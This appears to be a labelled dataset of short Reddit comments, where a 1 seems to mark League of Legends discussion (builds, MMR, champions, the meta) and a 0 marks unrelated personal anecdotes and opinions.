0	Unfortunately for Dominos, I got hit with a bad case of vertigo using the elevator to go down and get their pizza from my apartment a couple years ago.   I just remember getting really really nauseous while eating the pizza, and so began my week long battle with something I had no idea what. Bed ridden for a couple days, no one understood or believed me that I couldn't stand properly or even keep my eyes open without wanting to puke.   Finally WebMD'd my conditions, concluded on vertigo, then when I was home alone one weekend I decided to give my campus medical center a call and they told me to get a ride down to see them immediately.
1	I watch the stream because you are an amazing guy. I love watching you rage on solo queue or when you make "THE PLAYS" with OddOne. You have a great music selection, I even made a Gorillaz playlist on my Pandora because of hearing it on your stream, i knew who they were and liked their music i just never thought to put it in a Pandora station. You inspire me to be a better League player. I admit I do take somethings I watch on your stream or videos and try them out in my games, because I main top too, and they are fun. Like playing Volibear with Surge, I had such a fun time doing that. I've only started watching streams a little while ago, and I'm sad that I didn't earlier because I've been playing for such a long time. I know there is a chance that this won't really be seen by you, but if it does then I hope you can enjoy my words from a simple guy. You are always entertaining to watch, at least in my book. I even leave your stream on sometimes when i'm playing just to hear your audio, whether I'm playing solo queue or with friends. So if you decide to try and entertain more or even just stay the same i'll still watch your stream.
1	My favourite part is when loading screen freezes when everyone's at 100% and you're like "dafuq this is taking a while" and then you realise Riot are retarded and have put no way of detecting if you've crashed or not whilst in loading screen, so you reload and the enemy laner is five levels ahead AND WOW I'VE GOT SUCH A GREAT GAME AHEAD OF ME.
1	I don't think this is a very good suggestion. Not to sound like I'm one of those "exclusive" assholes per se, but I paid real money for skins that I like and want to show off.   -If Lee Sin is free, I want to play him. In champ select everyone and their mother is thinking " oh god its free week lee prepare to kick away from team ". Then loading screen pops up with the Dragon Fist splash art. While it might not mean I'm a pro at the champion I'm playing, for some one to own an expensive champion AND a skin means they are at least a bit seasoned with that champ.   -This  doesn't always hold true , but skins=skill to  SOME EXTENT . I have invested 1820 RP into Brolaf, but only after playing him for an  extremely  long time. If someone has a skin, then  logically  they plan on playing that champion for a long time/have already played them.   -I know we all know that person who buys a champion and skin with them straight away, or the people who are new to a champ and have a skin that was on sale, but the general majority of people who own skins have an idea of what they're doing with that champion. Making skins free for freeweek champs would cause unnecessary confusion while also decreasing sales. Why should I have to convince a random person that I own Lee Sin and X of his skins just because Lee is free? What if I suck at Galio but I am using Gatekeeper and I miss an ult "GG this freeweek skin but 0 skill" or "this noob says he have galio legen. skin look he missed fkin ult".   -One of the reasons I personally believe riot doesn't implement a direct skin viewer tool is because the image the skin splash has as opposed to the in-game model. I would have never bought Muay Thai Lee while knowing what the animations were, but the skin came out, I happen to be a Lee main, and I wanted to own all his skins (plus the splash looks really good).
0	I get what you're saying, but here's the deal: This isn't in AMERICAN history class.  We only took one AMERICAN history class, which was in 7th grade.  Everything else was WORLD history, STATE history (which is mired in black history and culture; several states were major slave hubs, or had major slave populations, or have huge black populations), or generally just effin HISTORY.  The only American history class didn't even bother starting until the Reconstruction and lasted up until the Cold War, because we spend about three thousand years on the Revolution and the military aspect of the Civil War and modern America.   Africans and blacks held an "inferior role" because we forced them into it.  As history was being made in ancient times in white Europe, it was also being made in Africa.  While white Europeans were building homes in the northern parts of America, black Africans were building an economy in the southern parts of America.  And don't get me started on how slavery has had a permanent cultural mark on the country.  There's plenty of stuff to talk about; everyone focuses on how the Jews got into Eastern Europe because of the Plague and the Romans colonized Britain (just
0	Not that I wanted to know this, but one night a good friend of mine told me his "secret" that he flicks/taps his taint every time after peeing and never has the dreaded drip. For a good few weeks I kept being afraid to touch his taint hands. But I now I kind of want to inform all men of this.  Ill never forget the image of my ex walking back into the bedroom naked and then watching a drop of pee ninja out of his penis down onto the carpet in frozen time that was so slowed down all I could do was watch in horror. Never want again.
0	We have some friends of the family who were in their eighties, where the husband recently passed away from a heart attack. We found out that the wife had become to weak to move around, but was too proud to get a wheelchair, so he had been carrying her around in their home, with her sitting in one of their dining chairs. This induced his heart attack, and she is now unable to care for herself and has moved to an assisted home.
0	That's so damn unfair. I'm sorry but it is. I'm literally just out of journalism school so I'm pretty idealistic, but come on. So any other industry is allowed to make money but god forbid news networks do? It's 2014 and CNN, Fox News and everyone else knows it. You can get your news and billion different ways. They have to compete with all these websites that can tailor make coverage to users. This story has a very mysterious appeal to it, which is not something that comes around that often. Ratings pretty directly reflect what people like/are drawn to. So god forbid they cover the stories that are gonna draw in viewers. Cause if they did that they'd be as bad as murderers, thieves, and rapists... I'm a sports reporter so I mostly watch ESPN, but it's hilarious because people complain about the exact same thing about that network on some of the sports subreddits. I swear almost every other "circlejerk" gets called out around here, but every time an anti-media circle jerk comes around, every single person is on board because everyone wants to sound "too smart to follow mainstream media." Sorry about the rant.
1	This has been discussed over and over.     Your LP gains and losses in ranked are determined by your MMR compared to what MMR is expected for someone in your tier/division.   EFT = Expected MMR for your tier/division   MMR < EFT --> LP gains < LP losses. The system thinks you should be in a lower division/tier.   MMR = EFT --> LP gains ~= LP losses. The system thinks you are roughly where you belong.   MMR > EFT --> LP gains > LP losses. The system thinks you should be in a higher division/tier.   Furthermore, in division 1 of any tier LP gains/losses are also affected by clamping. Clamping stunts your LP gains/losses. Clamping gets more severe the closer you get to your promotion. It is possible to gain +0 LP for a win if you are at ~99 LP and your MMR is insufficient for the next tier. For more information on clamping please read [this]( post.   Additionally, your LP gains and losses are also affected by the average MMR of your team compared to the average MMR of the enemy team.   For more information about the league system read the [Season 3 FAQ](   For more information about MMR read [this](
1	You only need a Doran's shield for laning HP regen. To avoid harassment, level your W instead of your E. At rank 3 of W, you can essentially get free last hits from a distance and never run the risk of getting ganked. Keep a ward in the river if you are concerned. If the enemy is all accounted for, you can literally 1v1 champions inside their creeps with your W activated and take 0 dmg.   I always rush Rylai's as the first item. If we have a real tank (read: shen, malphite, amumu, galio, etc), then I will continue into a Deathfire Grasp and Abysssal Scepter. After that, finish off with 2 defensive items (force of nature and a GA or SFC). If the team is stupid enough to think you are the tank, then go Rylais -> 2 defensive items -> deathfire -> scepter. Boots are obviously Magic Pen or Merc Treads.   If you build full tank, or the team considers you the only tank, then you and your team both do not understand Mordekaiser's potential. Mordekaiser isn't defined as a tank, he is best used as an Anti-Carry. With a combo of DFG + Ult + E + Ignite, any ranged (or melee) carry will be obliterated and you can proceed to quadra-kill the rest of their team. Tank Morde simply doesn't have this burst. With a typical 3 AP item build, you will be doing ~90%+ HP-percentage based damage to a carry.   I tend to let the real tank initiate, and lurk with our carries. If the team tries to rush your carry (especially if they have a twitch), you can literally just kill someone dead in their tracks. If the battle is on the front line, once things get heated just ghost through and unload on their ranged carry.
0	Generally you should just say "good drawing" because who the hell cares and it will make them feel good. It doesn't matter if it isn't the next Mona Lisa.   If they are genuinely asking for advice - not your opinion - but your advice on how to improve it, then you could say something like "I love what you did with the clouds, but I think it might look better with more vegetation".
1	Chat restrictions, bans, and any current punishments are merely quick fixes to the problem of "toxicity." Toxicity stems from different opinions and becomes an issue when neither side will back down to another's point of view. Needless to say toxicity actually resounds in every single person. Although a person who is a lot more verbal and harsher with his/her words will be punished, a player who can choose their words wisely yet still know how to irritate another player by their actions and or remarks will not be.  Some people don't handle criticism or any negativity well. Another problem is people also refuse to accept that their way does not work which may cause animosity within his own team. This player may not be "toxic" but their ignorance to the players around him will agitate someone else.
1	Cause even if someone is afk theyre still registered to the game i.e theyre still playing. When they disconnect you are getting a 2:1 vote.   So youre just dumb and dont understand how its coded. If youre afk ingame youre still ingame i.e coded as not afk. If you alt-f4 youre coded as not being in game
0	Women are less likely to take up manual labor jobs" is interesting point itself. Would you consider that an issue to be rectified? Are 50/50 gender distributions in coal mines, warehouses, and combat infantry ideal?   There's a lot of cognitive dissonance that comes into play on both sides when we have to discern whether gender rights movements are about striving for equality or simply acting as lobbying organizations to get more good stuff for whatever group they represent.   Unpopular opinion incoming: ultimately neither side likes to admit that actual equality is pretty unrealistic and nearly unnatural. The best society can hope to achieve is to give every individual equality of opportunity, but to what extent can we as a modern civilization dump resources into combating ancient gender dispositions and indeed biology itself? Until we can completely genetically engineer humanity into androgyny, the psychological and physiological differences between males and females will always make the purely ideological concept of "equality" a difficult one to tackle.
1	It's funny but not at all relating to the meta.   The meta just makes so much sense. I'm going to just go over AP mid.   Send the AP mid so they can, 1: Be close to blue buff. 2: They have the largest burst damage, so the ability to gank both bot and top is amazing. 3: They scale on levels as much as gold, so a solo lane is a must. 4: They don't have great sustain (usually) so they get the lane that is shortest, and thus closer to their tower, thus having an easier time escaping ganks.   Every single lane role makes just as much sense. If you want to throw wrenches into the gears of the finely tuned machine that is the current meta, do it in normals, that's fine, that's why they're there for.   Just because the monkeys don't know why climbing the ladder is bad, doesn't change the fact that  climbing it is still bad.  If you replaced the monkeys with 5 new ones, they would eventually all decide that it is best not to climb the ladder (and that it is best not to change the meta).
1	Even though you got one legit point (and there are probably a few more) out of this comparison you should not hold dota as the straight up better system.   Especially this has nothing to do with the quality or the entertainment heck hardly even with balancing. That's just a different system. And it's totally subjective which one you like better. There is no straight up better one.   LoL could deal with assassins a bit through items allowing them a stronger scaling and more of the  BOOM  feeling while playing them into late.   But the type of stats and scalings are not really open for debate or change even less so if that'd mean changing the game into another one.   Yes Dota provides more freedom in itemization... heck in pretty much every aspect of the game. But is that better? Arguably no. The more systems and choices you stack on top of each other the more points of errors there are. People don't play games to be the ultimate master. They play them for fun and that is given by good game design no matter how complex it is. Best example for this: Cookie clicker. Probably one of the most simple games I've ever seen. It's really a no brainier without even a objective... still played by hundreds of thousands for dozens of hours.   To finish this huge wot.
0	My parents also went through a nasty divorce when I was about the same age as you. Through the divorce my mother was nasty and took up the role of the villain, while my dad was just, well, bummed… I found out that my mom had cheated on him when a random dude showed up at the front door to tell my father what she had been up to (naturally I was tucked behind the corner listening to the whole explanation)   I had always been fonder of my dad than my mom, but now she was my number one enemy. My dad worked really hard to keep us all comfortable and happy, and here she was running off and ruining our family.   After the divorce I was cruel and rude to my mom, and supportive to my dad. Why wouldn't I be? She cheated, she was a bitch, and he was a cool dad who made all the money. But, I was unaware of the financial faults my dad had made, the fact that he lied to my mom about their finances for years, and that he ended up getting our house foreclosed on because he refused to sell year after year even though my mom pleaded with him to do so. My dad had put my mom under unbelievable stress, and I expected her to suck it up and sacrifice her sanity/happiness to keep my ideal family running smoothly. After allowing my anger to cool, and having honest conversations with my parents about what had happened I don’t hold anything against my mom for what happened.   I’m not saying what you did was wrong or unjustified, But I can’t help but think if I had reacted this stubbornly and never given my mom the chance to redeem herself after she cheated, that I would have lost a great parent and friend, and the idea of that makes me sick to my stomach. For this reason, I sincerely hope that your mom is the monster you make her out to be, and not just someone who was in a degrading relationship and made a rash decision.
1	If you mean you get more ip the more champions you have, it's a terrible idea (no offence, please read below to see why).   More champs = more ip to spend on less = more wasted ip   Less champs = less ip to spend on more = needing more.   "Well then Brundlfly, make it so you get more ip the  fewer  champions you have."   This has the negative impact of reverse rewards, you buy more to earn less? It encourages players to sit on tons of ip, buying no champions, because they'll earn less ip, and so you have to balance owning champions out with getting ip. This means that new players are discouraged from buying cheaper champs especially because after buying them all (which can be done in a small period of time), their potential profit is decreased, meaning they are compelled  not  to buy champions.   It's a nice idea, but practically infeasible (which is why it has to be degraded, sorry) as it's either an inverse reward, in that buying champs loses you potential ip income, or you gain more ip the less you need it, and you then earn less ip the more you need it.
1	ability details
0	INTENTS AND PURPOSES.   AND DON'T GIVE ME ANY OF THAT "the meaning has changed" BULLSHIT. THAT SHIT IS THE REASON WHY WE HAVE 14 YEAR OLDS ON TWITTER  LITERALLY  DYING EVERY 2 DAYS 'CAUSE BECKY WORE FLIP FLOPS DURING THE OFF SEASON.
0	Actually r/atheism usually prides itself on aligning its goals and values with LBGT movements and causes - that is one of their 'related' topics that you'll hear them speak a lot in defense of.   The problem with atheism is that it's not  actually  a topic in and of itself. It's a  reaction  to another topic - theism. If theism didn't exist in the form it does today,  neither  would atheism. There isn't any specific anti-nazi movement today, because there is no significant pro-nazi movement either. Antitheists are people who are opposing a large movement, [usually] because they think it's based on intrisically false and destructive values. The same goes for the LGBT movement - they're opposing a widely held (now possibly decreasing) anti-homosexual perspective in society.
0	Our teachers are complete idiots when it comes to smart boards. Me and my friends got into trouble for "breaking" the smart board when we didn't do shit. Some guy was doing a presentation that the teacher didnt give two shits about and then he unplugged something that he needed to unplug to make the presentation, and the teacher didnt know what it was. So naturally, blame the 5 kids who were playing sorry 7 feet away from it. The next morning we came in, we got detention and got a lecture about how they spent 5 hours figuring out how to plug something in.
0	When I was in 6th grade, one of my twin brother's classmates died in an accidental drowning at the school pool. I met him a few times, he would ask me what being a twin was like. Anyway, it made news all across the Buffalo area. There was a whole controversy about there being no life guard and only the gym teacher watching the kids, the broken oxygen tank or whatever it's called. I'm not gonna name him, but the kid had asthma problems, but was athletic, he likely had an asthma attack when he was under water, I can't recall all the details.   Anyway, after the kid died that day, the school was closed for a few days because they emptied the pool and that did some shit to the plumbing. When we got back, students in my grade were offered grief counseling. An investigator came to our house to ask my brother questions, since he was nearby the kid when he had his attack. It was totally fucked up.   After all this had happened though, it's like the school didn't even think about taking his name off of the system. This happened in December, at the end of the first half of the school year. In January, after Christmas break, one of the teacher's ask if the kid is here, attendance. One of the girls starts crying and someone had to explain what happened and why this teacher didn't watch the news, he was shocked.
1	Riot needs to solve the smurf premade problem, by the way)   You're not level 30, but try playing a few ranked games before you start complaining about smurfs. Normals are where people go to goof off, try new things, be creative with builds, and yeah, sometimes 4 people are gonna queue together and pick on new players. That's part of pretty much every game with a large community.   You're farming IP in normals and ranked is what you do when you want serious matches. Besides, if you're playing against people in normals who are more experienced in the game, it's only going to serve to teach you what mistakes not to make later in a context where people will actually get pissed at you for making them.
0	Currently -14 below without windchill here. Monday expects -40-60 below with windchill.
0	He is just Karma Whoring- This is what she really said- in his previous post about the breakup.   "So after a day of hanging out yesterday with her and her room mates around town, at the end of the night I decided to ask her if everything was okay and that I'd noticed some distance between us and she said she felt it too and the bad part was it didn't bother her. She said she didn't know what she wanted and that she doesn't know if she wants to be in a relationship. She said that she was getting over some personal issues(through therapy) and that she really wanted to focus on herself right now and be selfish.  We talked for a couple hours, it started out as we should take it slower and give each other some space for a few days to think about it to her saying that you can't go back from a conversation like this and that we should break up.  She said things like it sucks ending a relationship with so many positives, that we had so much fun together and that she wants me to be a part of her life.   I don't know what to do, I really care about this girl and it seems like it just happened so quickly.  Should I consider this over? Or should I just give her some space and see if she changes her mind and that its just a phase we're going through and that you can come back from a conversation like this?   Thank you for taking the time to read this and any advice or perspective you may have.
0	Well here in Sweden, and most arts of Europe afaik, a lot of people think that all muslims are terrorists and shit, of course it isn't true, but that's the defining loud minority, and it pairs well with the rather unpleasant racist atmosphere in Europe at the moment.   Also, a lot of people are very aggressive towards feminists because of the radicals.   There is one problem here though, the people that are usually sending out messages about one group (defined by a vocal minority) being bad are also the vocal minority most of the time.   There is a reason I immediately assume someone is a big fucking idiot if I hear he's voting for the Nationalist Party, when truth is, there are a lot of misinformed and/or dissatisfied people who believe a vote for that party is the only way to change, but they are defined by the neo-nazis that continue the say and do unbelievable stuff every day. Today, a local group from SvP (one of the worse politically involved nationalist groups in Sweden) put up a big sign in front of a newly established refugee camp, that was saying, in Arabic, "Go home, you're not welcome here".   It doesn't sound like much, but they are capable of more, and it was likely just a warning. If I was a refugee, I have no idea how I'd react. Representatives from SvP has also said that they want to DNA test every single person living in the country, so that anyone who isn't an ethnic Swede (whatever the hell that means) can be sent home.   That was more than slightly off topic, but it prooves that these people, a loud minority of extremists, have defined a larger group for me.   My conclusion is, as well as my
1	See the problem I have with this argument is that a philo stone does not make you any harder to kill. If you're facing a Graves Taric lane a fairy charm or bead start is a death sentence. They will just all in you at level 2 and just eat you alive. That's an extreme example but most bursty lanes can get the same effect. Bottle and ward start is my standard open now for the extremely gold efficient sustain it gives along with buying 4 greens to start.
1	lets look at the 06-07 cavaliers. granted they didnt win, but they made it to the finals, so that is good enough for this example. lebron fucking carried that team. he single handedly won them the conference title vs the pistons scoring 29 out of the entire team's 30 points in the 4th quarter in game 5, and basically was the only person who looked like he wanted to win that entire series. he made it to the finals, so he had to have help right? fuck no, he literally averaged DOUBLE the output of any other player on his team, the sad part? he even doubled in ASSISTS. they made it to the finals right? they had to be good right? no, he had 0 help. he had anderson varejao who shouldnt even be in basketball right now, and Zydrunas Ilgauskas who was like 90 years old at the time (31). so yes, top teams that have title contention suprisingly DO have weaknesses. this was a more extreme example of the manhood that is lebron james, but every team has weaknesses and even top teams have huge ones.   sources for that segment:   as for the best player being a puner, if you honostly think that the support position is like the punter, then im going to assume that you are either sub 30 or very bad at this game. i would say it is more like saying your Oline is your best asset, for example denver. 04-07 they managed to make names like droughns, bell, and young actually sound like they were good, even though they literally did nothing after they left. how is that even possible? because the o line was actually pretty decent, and it could have been you, or it could have been me that ran for them and we both would have been top fantasy running backs.   source:
1	It's not a spectator option, it's a stream. It means that someone is transmitting a video stream to you, which means that his computer does the 3D rendering work and the video compression work. These are extremely expensive operations in terms of CPU, memory and bandwidth. Asking Riot's servers to render, for every game, the "directed camera" view and stream it to people spectating the game on their mobile devices, is not reasonable. At least in terms of processing power and bandwidth, rendering the 3D world and streaming its video costs consequently more than just running the game server.
0	We were using SLIP connections for email at work around 1987. My first home modem was a 2400 baud in the late 80s if I recall correctly. I ran qmodem, then later Procomm Plus. In the early 90s, I had an ISDN 2d line (128 kbps!) for work. Shortly after that I got an @Home cable modem that had 384 kbps cable d/l and 56k (ish) dial u/l. Not long after Comcast purchased @Home, they offered bi-directional cable so I upgraded again. At this point I have FiOS 35/35.   I work for a network service provider, was directly involved in deploying our regional dial ISP service back in 1994-95, and still work today growing our service. We made our share of mistakes in the early days, especially when dealing with the exponential growth factors we were experiencing. It's been a wild ride... There was a strong geek factor in our part of the company back then. I recall thinking how cool it was helping to build the Internet, and often wondered what it would turn out to be in 10 or 20 years. I've been a geek since the early 80s, and always thought my children would be as well.   Today, I look at my 14-year-old son and am constantly surprised at how he uses the Internet. To him, it's always been a normal part of his world like electricity. His iPhone is an extension of his left hand. He pops on one of the several wireless laptops or iPads always running in our house whenever he wants to check weather, sports schedules, or his fantasy teams. He has zero geek factor, and that's just the way he likes it. For me, the internet is my life and livelihood. To him, it's nothing special, and he uses it without a second thought while living his life (which, I guess, is how it should be).   Things have certainly changed, and I think for the better. I'm excited to see how the Internet will have transformed our lives in another 10-20 years. If I'm lucky, I'll see how my grandchildren use the technology I helped to build all these years.
0	Honestly if the student got sick over it, I don't see a reason the teacher wouldn't be liable. Given that they work for the school. Although it could be something in the student hand-book that says you are an adult now and anything faculty gives you is your responsibility. But given that you need to sign a release saying you won't eat the walls of older houses when you rent them, I kind of doubt the general handbook can cover this kind of thing legally.
0	I am sorry, but you are simply incorrect.  Lets compare say, a higher-end 15 inch laptop, it is what I have and i think it is the most versatile for a laptop that would be a primary computing device for example, in college.   lets compare these two   the Macbook pro base price without the retina display is  $1,799.00  *(mac's cheapest 15 inch, if you want that flashy glossy retina display, its gonna run you 2,199)     processor: 2.3GHz Quad-core Intel Core i7,   graphics: NVIDIA GeForce GT 650M with 512MB GDDR5 memory   4gb ram   500GB Serial ATA Drive @ 5400 rpm HDD   1,440-by-900-pixel LED-backlit, glossy display   And that is all the specs we can learn about this from apple's website.       Source: (   the Lenovo highest end 15 inch laptop is the W series, its base price is  $1,231.12     Intel Core i7-3630QM Processor (6M Cache, up to 3.40 GHz)  (it is technically faster than mac's by 1.1GHz)   NVIDIA Quadro K1000M Graphics with  2GB  DDR3 Memory  (that is much more powerful than mac's)   8GB ram  (yep double mac's, you can get this in your macbook, but its going to run you an extra $100)   320GB Hard Disk Drive, 7200rpm  (this has less space than the standard mac, but it can be upraded to 500GB for only $40, also these have an extra 1800rpms so they are faster)   15.6" HD+ (1600 x 900) LED Backlit AntiGlare Display, Mobile Broadband Ready  (you can upgrady your macbook to an "anti-glare display" for an extra $100, but the mac is already expensive enough at over $500 more)     Source:
1	Sorry, didn't explain that very well.   You (Morg) are standing facing the creeps with your back towards your tower. You see Talon coming in for a combo. First, if you are close enough for a double hit rake without him using blink, you are playing Morg wrong or baiting for a gank. Now, you see him coming and you turn and start walking towards your tower. This is the tricky part, you need a fairly decent idea of the range on his blink. Once he is in that range turn your shield on. You will not be silenced or slowed when he does decide to rake. I know Morg's bind is pretty easy to dodge at a distance, but in rake range you should be fine. Hit him with that and your w and you'll win the trade. If he hits that slow and procs his passive, he'll win the trade.
1	Due to MMR, Someone who wins a lot can play with players who are rated WAYYYY above them. Obviously this shaco play's and wins a lot, but can't get past bronze for some reason. it also works backwards, if you loose a lot, you start to play with lower skilled players... So
1	It is one of the most fun things to do. Going Nautilus AP mid, hitting the entire enemy team with your ultimate and effectively 1v5'ing them is a great feeling.   The infamous AP Janna mid is great, I have done a lot of Rengar/Leona bot lanes lately (other lanes that work great are Xin/Leona, Irelia/Leona) instead of having a proper ad carry.   Another fun thing I have done is the standard tank top, an assassin (e.g. Talon) mid and three bot - Support, AP, AD. Support starts roaming. Of course it's not truly a change in Meta since it is merely a counter to the current meta, but they're certainly some of the funnest games I have ever played.   Also very powerful is Nocturne mid, Nunu mid of course, Karma EVERYWHERE. :D
0	What's up with buses and wallets?  Here's our story.   My brother and I were taking a bus out to go play some laser tag on a Friday night. When we got to a transfer station we had to go over a cross walk and get in the next terminal. When we reached the terminal my brother went to grab his ticket and realized his wallet was gone.   We traced back ours steps and while walking (at night around 8pm) some cops pulled over and asked what we were doing.  We told them what happened and they started helping us look for the wallet.  Suddenly my brother saw his wallet about 30 ft away laying on the cross walk. As he starts running towards it.  One of the buses drives buy and runs his wallet over instantly crushing it and breaking all his id's.... His ticket was a little bent but survived so we continued onto laser tag and had an awesome night. Hahaha we all had a big laugh,  about it and still talk about that night sometimes.
0	You burn down a business, the owner may or may not get some of his investment back, but the business is gone. Therefore, no more employment for the people that were working there, so they are now unemployed and can not contribute to the economy of that region, which in turns may or may not affect other business that may then have to let others go...
1	Basically:     Why are you dying without using your ult. Very few junglers/lanes can actually kill shen when played well.   You shouldn't be dying unless you're ulting in and fight goes sour, so revive wouldn't help shit.
0	I have been a redditor for years, and don't comment often, but had to log in to post this.   So, I know this girl, was on this trip, and was behind my buddy Dave when he took this picture.   I was very surprised to see this here. She is definitely not an entitled person, and while her parents are not destitute (I have met them), they are also nice people who work hard for what they have and do.   I know that the girl in this picture worked hard and saved up to go on this trip, and the only reason she has been to all seven continents so early, is because she is driven to do so, and worked hard to make that happen. She also has family and friends that she has stayed with in many different countries, which allows her to travel cheaper --- the same thing I have done many times.   I also know that while she might like fame, she doesn't deserve it for this meme, but rather her own accomplishments.   I would confirm this, it would be as simple as posting one of the pictures of her and I from a different angle, but I refuse to give any more meme ammunition, or release any more of her personal information.   Most memes are funny, this one is just full of spite, and she doesn't deserve it.
1	If it was halved in range, he becomes a pretty great cc heavy champ, but he punishes people who are out of position, not people who aren't constantly aware of the fact they could get grabbed over a wall into a waiting team.   He's like Nidalee in that playing against him becomes an exercise in micro managing your position, much more so than any other champs can make you do. It's not fun to play against, and "counterplay" (as riot is so in love with saying nowadays) revolves around not standing still, warding all the bushes and accepting that he will pull someone on your team late game which will make it a 4v5 and you will lose.   This isn't what any player enjoys playing against and it encourages the kind of play riot has been moving away from, conservative, overly cautious play. And playing as him? No more fun, you just keep throwing q's, and it's a matter of time till it lands and you get a guaranteed kill from the q, knockup, 30s cd aoe silence and damage and passive taht prevents countering this with just fighting.
0	That reminds me of another story. Two friends of mine regularly went into walmart to steal. Then one gets caught while the other one managed to run away. Cop questions the friend who got caught and makes him call his friend to come back saying how they already had him on video. He comes back and they both get arrested.
1	During highschool I aspired to maintain the highest level of fitness possible. I volunteered at a local gym as a helper and worked out 1-3 hours a day. I spent my first 3 years  after  high-school in the fucking army doing rigorous fitness routine five days a week and working out on my own the other two. I played videogames that whole time. I still play league a hell of a lot. Why? Because it's enjoyable. You should probably not make such broad statements about people in a community that you obviously know very little about. The gamer world, as it were, is rapidly growing to include many circles of people. Although not everyone who is a gamer now was a gamer back on the N64 or the NES or further back to Atari/Commodore, it's a very real idea that not everyone who plays videogames is a 120 pound, acne-ridden-sex-deprived-serial-killer-in-the-making as the media likes to portray us.
0	One time I saw someone's grandma/relative write  "hi bart you loke being my friend bart" on his timeline. I was thinking how awkward it was. He responded: "yes I sure do! :)". And suddenly he was awesome.
0	As someone who worked for my student union for one year (and I'm white), I think there is some truth to what you're saying but also I think you're a bit ignorant about some things.  First - "clubs" like Race & Ethnicity, Mature Students, Queer Alliance, etc. are all done to provide safe spaces for people to engage in. In theory, white people don't need those clubs because the world is more-or-less designed with us in mind. To illustrate this point better, imagine that someone is making you feel like complete shit during a class, or a meeting, or a party - you have the option of packing your shit up and walking out. Marginalized people can't just pack up their shit and walk away to a place without racism/homophobia/etc.  So, that's why those bases are essential.   on the other hand , I completely agree with you. Every student at my university has to pay $60/Semester to the Student Union in a levy that goes to renting those spaces from the university. They have lounges, and events and bake sales... and although the white kids are paying for this services, they don't get anything back. That is fine, on principal because we have a social conscience.  What's not fine, and where I became completely disillusioned with activism was that people expect you to PAY and to CARE and NOT PARTICIPATE.  If we're paying the $120/year, buying from the bake sales and signing every petition you harrass us with, then we should feel some sense of fraternity/sorority.. but we don't.  This issue is always best demonstrated (in my opinion) when  Men's Rights  groups advocate for space on campus. They are almost always met with overwhelming resistance from almost all other groups.  I worked in peer support for a number of years, and the amount of men who would benefit in great ways from a  Men's Center  is substantial. Esepcially with the double-standard in society now about "Being a man" and "manning up". Crying, talking about our feelings or expressing vulnerability is something we're trained not to do and it leads men to perpetuating a lot of social illnesses.  That is to say, I don't think there should be a "white students center", but there should be a "Student's Center" that isnt' race or gender specific...
1	I find that I can get flare stacked by 17 mins, most of the time if I ignore lanes completely 14-15mins and lanes have gone +-2kills over all lanes I finish flare, gank mid counter gank bot and boom we gain ~3 kills, soloq is very linear, most jungles do the same thing all the time.
1	or their other mantra "we heard your complaints and are working around them accordingly to make X champion/item more viable, we promise that this will be fixed soon" and it never happens
1	I guess I'd try to stick with my supports. Silver and Bronze supports are always forced to be there and almost never know what they are doing :)   On no other lane can you make them lose so much AND blame the team for making them play the support. ;)
1	Resist do work fairly well at stopping the damage output of a single damage type.   The problem in the GG AZF game wasn't that Black Cleaver is overpowered. It was that GG built a team comp that was purely physical and had champions that naturally shred the resistances that protect against physical damage.   Essentially, Singed would have been able to tank a purely physically team with that build in 80% of games if not more. The problem that he ran into is that he didnt consider the various shred abilities of Renekton and Xin and therefore when team-fights occured in the endgame, he was tanky, but not quite tanky enough.
0	Basically what you've told us is that you buy Brisk more, and then afterwards you buy Arizona.
1	Jarvan is the only jungler that can gank Gangplank and eating oranges will not fucking make it ok. Also says hello to Morgana's Black Shield.   Jarvan is like a poor man's Lee Sin that scales better to late game. A six item Jarvan is fucking scary, as he'll just go manmode on your carries.   His ultimate in its current form is bullshit though, especially with the trend that Riot gives almost every new champion a dash. Even fucking Kennen and Vayne can get through it, the ultimate should stun the selected target for ~a second for it to be a truly viable ganking tool. Oh you ultimated me, I guess I'll just counter it with a skill that's on as little as a 2 second cooldown (Vayne says hello).
0	Doctors get paid much better in the states. Mind you, they get paid a fucking shitload in the states. They get paid well in Canada but in Quebec there's a lot of bullshit work added on top that makes them want to leave.
1	One issue that I see arriving with this solution would be with queue dodging. Some streamers (cowsep and sirchez come to mind specifically) will get a champion that they use banned or picked away and they resort to queuing up with another account to avoid the dodge time penalties. I'm not saying that what they are doing is wrong, but I don't know how your suggested change would impact this practice.
0	I find that if I comment, nobody will read it, and wont care. This is probably my second comment, and I've never made a post.   Edit:
1	I can give you legitimate reasons Monte failed them as a coach. 1: He did not prepare them for Curse's Split push strategy. Sorry but as a coach it should be your job to have an answer for every possible outcome. 2: He himself admitted it was his idea to put doublelift in a solo lane to farm. Thus putting all the pressure on the one you claim chokes. Idk about you but that sounds like bad coaching. 3: In Korea all they did was worry about improving their own play because for some odd reason CLG thinks they are the best Western team if only they played like it. Curse does innovative things not because they think they are better but because they try to find what works for them. Meanwhile CLG does the same thing Koreans do because they think they are the best in the West. Just watch any of the Chasing the Cup interviews.. Sorry but the Coach preps the team comps and strats. Again his failure.   While I may agree that they need to roster swap just about everyone on their team. You can't shield Monte for not doing his job. It's part time for him and at best a hobby. Not his career. Therefore he doesn't invest the same as say Choi Yoon-Sang (hc of samsung Blue). Thus reducing his effectiveness.
0	I ate a nice big portion of yogurt before going to Ikea once... It was a terrible time to find out I am lactose intolerant...   Being in the middle of the maze, I thought I would never find the bathroom in time, Twice!   Following the arrows is not always the best option. Sometimes they lead you further into the maze. They don't label the quickest way to the bathroom because they want you to shop, otherwise they would have signs for the shortcuts, and tell you the bathroom is quicker to go back the way you came...
0	I can't speak for all schools but the one I go to if you don't study you don't get good grades (You will likely get a C max, most likely fail) it has a low admittance rate (15%) and when you graduate it has a very high job placement rate.   Since I have no money I am glad that I am on full scholarship and I worked hard during my high school career to make an opportunity like college available because going to this school seems like a great idea.   However I have a few friends that go to CC, out of 4 of them 3 of them never study and they make straight A's and regularly party and skip class. The other one isn't really cut out for college and struggles.   Do any of them spend as much studying as I do? No. Am I smarter than them? I don't think so.   Two of them will be transferring to a state school and they will get their degree from a university and if they wanted to they may go into the same field of study and career as I. Though they have learned similar material I think their chance of getting a job over me is lower because: 1) Where you graduate from is marketable to employers 2) They are not as hard working and used to work as I   Can you be successful from a CC? Absolutely. Is it the BEST way to ensure you are successful? For my career path, no.
